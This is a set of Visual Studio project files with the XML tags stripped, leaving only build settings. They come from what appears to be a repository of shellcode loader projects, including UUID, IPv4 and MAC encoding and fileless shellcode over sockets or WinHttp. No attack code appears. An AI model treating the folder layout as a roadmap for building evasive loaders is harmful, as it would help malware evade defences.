2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {b2ee63ea-095f-40cc-92d8-bac976655636}
25 | AES
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {70527328-dcec-4ba7-9958-b5bc3e48ce99}
25 | UUIDs
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {b651a53c-fae6-482e-a590-ca3b48b7f384}
25 | Base64
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {497ca37f-506c-46cd-9b8d-f9bb0da34b95}
25 | SimpleLoader
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {11385cc1-54b7-4968-9052-df8bb1961f1e}
25 | IPfuscation
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {e991e6a7-31ea-42e3-a471-90f0090e3afd}
25 | MACshellcode
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {847d29ff-8bbc-4068-8be1-d84b1089b3c0}
25 | CustomEncoding
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {1617117c-0e94-4e6a-922c-836d616ec1f5}
25 | FilelessShellcode
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {9aa32bbf-90f3-4ce6-b210-cbcdb85052b0}
25 | WinhttpShellcode
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------